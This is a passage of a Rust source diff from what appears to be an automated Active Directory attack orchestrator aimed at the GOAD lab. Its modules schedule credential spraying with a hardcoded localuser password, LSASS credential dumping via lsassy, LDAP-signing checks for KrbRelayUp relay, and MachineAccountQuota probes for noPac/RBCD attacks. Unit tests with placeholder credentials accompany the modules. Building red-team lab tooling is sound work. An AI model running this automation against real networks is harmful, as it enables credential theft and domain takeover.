std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(item.dc_ip)); + d.insert("domain".to_string(), json!(item.domain)); + d.insert("signing_required".to_string(), json!(false)); + d.insert("channel_binding".to_string(), json!(false)); + d + }, + recommended_agent: "coercion".to_string(), + priority: dispatcher.effective_priority("ldap_signing"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!( + domain = %item.domain, + dc = %item.dc_ip, + "LDAP signing disabled — vulnerability registered for KrbRelayUp" + ); + } + Ok(false) => {} + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to publish LDAP signing vulnerability"); + } + } + } + Ok(None) => { + info!(domain = %item.domain, dc = %item.dc_ip, "LDAP signing check deferred by throttler"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch LDAP signing check"); + } + } + } + } +} + +struct LdapSigningWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("ldap_sign:{}", "192.168.58.10"); + assert_eq!(key, "ldap_sign:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_LDAP_SIGNING, "ldap_signing"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ldap_signing_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ldap_signing_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = LdapSigningWork { + dedup_key: "ldap_sign:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_uses_dc_ip() { + // LDAP signing dedup is by DC IP, not domain + let key = format!("ldap_sign:{}", "192.168.58.10"); + assert!(key.starts_with("ldap_sign:")); + assert!(key.contains("192.168.58.10")); + } + + #[test] + fn dedup_keys_differ_per_dc() { + let key1 = format!("ldap_sign:{}", "192.168.58.10"); + let key2 = format!("ldap_sign:{}", "192.168.58.20"); + assert_ne!(key1, key2); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_domain_controllers_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "ldap_sign:192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_dc() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_LDAP_SIGNING, "ldap_sign:192.168.58.10".into()); + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_LDAP_SIGNING, "ldap_sign:192.168.58.10".into()); + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam credential available + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/localuser_spray.rs b/ares-cli/src/orchestrator/automation/localuser_spray.rs new file mode 100644 index 00000000..734a6914 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/localuser_spray.rs @@ -0,0 +1,294 @@ +//! auto_localuser_spray -- test localuser/localuser credentials across domains. +//! +//! GOAD configures a `localuser` account with username=password across all three +//! domains. In one domain this user has Domain Admin privileges. This module +//! specifically tests the localuser:localuser credential combo against each +//! discovered DC, which standard password spraying may miss if it doesn't +//! include "localuser" in its wordlist. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect localuser spray work items from current state. +/// +/// Pure logic extracted from `auto_localuser_spray` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_localuser_spray_work(state: &StateInner) -> Vec { + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("localuser:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_LOCALUSER_SPRAY, &dedup_key) { + continue; + } + + items.push(LocaluserWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + }); + } + + items +} + +/// Tests localuser:localuser credentials against each domain. +/// Interval: 45s. +pub async fn auto_localuser_spray( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("localuser_spray") { + continue; + } + + let work = { + let state = dispatcher.state.read().await; + collect_localuser_spray_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "smb_login_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": "localuser", + "password": "localuser", + "domain": item.domain, + }, + }); + + let priority = dispatcher.effective_priority("localuser_spray"); + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "localuser credential spray dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_LOCALUSER_SPRAY, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_LOCALUSER_SPRAY, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "localuser spray deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch localuser spray"); + } + } + } + } +} + +struct LocaluserWork { + dedup_key: String, + domain: String, + dc_ip: String, +} + +#[cfg(test)] +mod tests { + use super::*; + + // --- collect_localuser_spray_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_localuser_spray_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "localuser:contoso.local"); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed(DEDUP_LOCALUSER_SPRAY, "localuser:contoso.local".into()); + let work = collect_localuser_spray_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.mark_processed(DEDUP_LOCALUSER_SPRAY, "localuser:contoso.local".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "localuser:contoso.local"); + } + + #[test] + fn collect_no_credentials_needed() { + // localuser_spray does NOT require existing credentials (it uses hardcoded localuser:localuser) + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + assert!(state.credentials.is_empty()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn dedup_key_format() { + let key = format!("localuser:{}", "contoso.local"); + assert_eq!(key, "localuser:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_LOCALUSER_SPRAY, "localuser_spray"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let payload = json!({ + "technique": "smb_login_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "localuser", + "password": "localuser", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "smb_login_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["credential"]["username"], "localuser"); + assert_eq!(payload["credential"]["password"], "localuser"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let work = LocaluserWork { + dedup_key: "localuser:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "localuser:contoso.local"); + } + + #[test] + fn no_credentials_needed_in_work_struct() { + // LocaluserWork does not carry a credential -- it uses hardcoded localuser:localuser + let work = LocaluserWork { + dedup_key: "localuser:fabrikam.local".into(), + domain: "fabrikam.local".into(), + dc_ip: "192.168.58.20".into(), + }; + assert_eq!(work.domain, "fabrikam.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("localuser:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "localuser:contoso.local"); + } + + #[test] + fn credential_uses_domain_from_target() { + let domain = "contoso.local"; + let payload = json!({ + "credential": { + "username": "localuser", + "password": "localuser", + "domain": domain, + }, + }); + assert_eq!(payload["credential"]["domain"], domain); + } + + #[test] + fn per_domain_dedup() { + let domains = ["contoso.local", "fabrikam.local"]; + let keys: Vec = domains + .iter() + .map(|d| format!("localuser:{}", d.to_lowercase())) + .collect(); + assert_eq!(keys.len(), 2); + assert_ne!(keys[0], keys[1]); + } +} diff --git a/ares-cli/src/orchestrator/automation/lsassy_dump.rs b/ares-cli/src/orchestrator/automation/lsassy_dump.rs new file mode 100644 index 00000000..b60597d5 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/lsassy_dump.rs @@ -0,0 +1,541 @@ +//! auto_lsassy_dump -- dump LSASS credentials from owned hosts via lsassy. +//! +//! After secretsdump or other lateral movement marks a host as owned, +//! this automation dispatches lsassy to dump LSASS process memory and +//! extract additional credentials (Kerberos tickets, DPAPI keys, etc.) +//! that secretsdump alone doesn't capture. +//! +//! This is complementary to secretsdump: secretsdump gets SAM/NTDS hashes, +//! while lsassy gets live session credentials from LSASS memory. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect lsassy dump work items from current state. +/// +/// Pure logic extracted from `auto_lsassy_dump` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_lsassy_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Only target hosts we've already owned (secretsdump succeeded) + if !host.owned { + continue; + } + + let dedup_key = format!("lsassy:{}", host.ip); + if state.is_processed(DEDUP_LSASSY_DUMP, &dedup_key) { + continue; + } + + // Infer domain from hostname + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + // Skip when the host's domain is dominated AND every forest is fully + // owned. We still want LSASS dumps from owned hosts in a not-yet-fully- + // dominated lab (session creds may unlock cross-realm pivots), but once + // we have everything there is no point grinding more memory. + if !domain.is_empty() + && state.dominated_domains.contains(&domain) + && state.has_domain_admin + && state.all_forests_dominated() + { + continue; + } + + // Find a credential for this host's domain + let cred = state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && (domain.is_empty() || c.domain.to_lowercase() == domain) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + // Fall back to any admin credential + state + .credentials + .iter() + .find(|c| c.is_admin && !c.password.is_empty()) + }) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(LsassyWork { + dedup_key, + host_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Dumps LSASS credentials from owned hosts. +/// Interval: 45s. +pub async fn auto_lsassy_dump(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("lsassy_dump") { + info!("lsassy_dump technique not allowed — skipping"); + continue; + } + + let work = { + let state = dispatcher.state.read().await; + let owned_count = state.hosts.iter().filter(|h| h.owned).count(); + let cred_count = state.credentials.len(); + if owned_count > 0 || cred_count > 0 { + info!( + owned_hosts = owned_count, + credentials = cred_count, + "lsassy_dump tick: checking for work" + ); + } + collect_lsassy_work(&state) + }; + + if !work.is_empty() { + info!(count = work.len(), "lsassy_dump work items collected"); + } + + for item in work { + let payload = json!({ + "technique": "lsassy_dump", + "target_ip": item.host_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("lsassy_dump"); + match dispatcher + .force_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.host_ip, + hostname = %item.hostname, + "LSASS dump dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_LSASSY_DUMP, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_LSASSY_DUMP, &item.dedup_key) + .await; + } + Ok(None) => { + info!(host = %item.host_ip, "LSASS dump deferred by throttler"); + } + Err(e) => { + warn!(err = %e, host = %item.host_ip, "Failed to dispatch LSASS dump"); + } + } + } + } +} + +struct LsassyWork { + dedup_key: String, + host_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Host}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_admin_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_owned_host(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: true, + } + } + + fn make_unowned_host(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + // --- collect_lsassy_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_unowned_host_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_unowned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_owned_host_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.30"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "lsassy:192.168.58.30"); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_LSASSY_DUMP, "lsassy:192.168.58.30".into()); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_admin_credential() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + // Only admin cred from different domain + quarantine the matching one + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + state.credentials.push(make_admin_credential( + "domadmin", + "Admin!1", + "fabrikam.local", + )); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "domadmin"); + assert!(work[0].credential.is_admin); + } + + #[test] + fn collect_bare_hostname_matches_any_cred() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_owned_host("192.168.58.30", "ws01")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_owned_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .hosts + .push(make_owned_host("192.168.58.31", "srv02.fabrikam.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_quarantined_credential_skipped_with_fallback() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "gooduser"); + } + + #[test] + fn collect_skips_empty_password_credentials() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("nopw", "", "contoso.local")); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn dedup_key_format() { + let key = format!("lsassy:{}", "192.168.58.22"); + assert_eq!(key, "lsassy:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_LSASSY_DUMP, "lsassy_dump"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "dc01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "dc01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "lsassy_dump", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "lsassy_dump"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = LsassyWork { + dedup_key: "lsassy:192.168.58.22".into(), + host_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "lsassy:192.168.58.22"); + assert_eq!(work.host_ip, "192.168.58.22"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn domain_extraction_from_fabrikam() { + let hostname = "sql01.fabrikam.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "fabrikam.local"); + } + + #[test] + fn dedup_key_with_various_ips() { + let ips = ["192.168.58.10", "192.168.58.240", "192.168.58.1"]; + for ip in &ips { + let key = format!("lsassy:{ip}"); + assert!(key.starts_with("lsassy:")); + assert!(key.ends_with(ip)); + } + } + + #[test] + fn credential_preference_admin_flag() { + let admin_cred = ares_core::models::Credential { + id: "c1".into(), + username: "domainadmin".into(), + password: "AdminPass!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let regular_cred = ares_core::models::Credential { + id: "c2".into(), + username: "user1".into(), + password: "UserPass!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let creds = [regular_cred, admin_cred]; + // Fallback logic: find admin credential + let admin = creds.iter().find(|c| c.is_admin && !c.password.is_empty()); + assert!(admin.is_some()); + assert_eq!(admin.unwrap().username, "domainadmin"); + } +} diff --git a/ares-cli/src/orchestrator/automation/machine_account_quota.rs b/ares-cli/src/orchestrator/automation/machine_account_quota.rs new file mode 100644 index 00000000..7c4b5a2e --- /dev/null +++ b/ares-cli/src/orchestrator/automation/machine_account_quota.rs @@ -0,0 +1,342 @@ +//! auto_machine_account_quota -- check MachineAccountQuota (MAQ) per domain. +//! +//! The default MAQ of 10 allows any authenticated user to create computer +//! accounts. This is a prerequisite for noPac (CVE-2021-42287) and RBCD +//! attacks. If MAQ > 0, downstream modules can proceed with machine account +//! creation-based attacks. +//! +//! Dispatches a recon check per domain to query the ms-DS-MachineAccountQuota +//! attribute from the domain root. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect MAQ work items from state (pure logic, no async). +fn collect_maq_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("maq:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(MaqWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Checks MAQ setting per domain via LDAP query. +/// Interval: 45s. +pub async fn auto_machine_account_quota( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("machine_account_quota") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_maq_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "machine_account_quota_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": 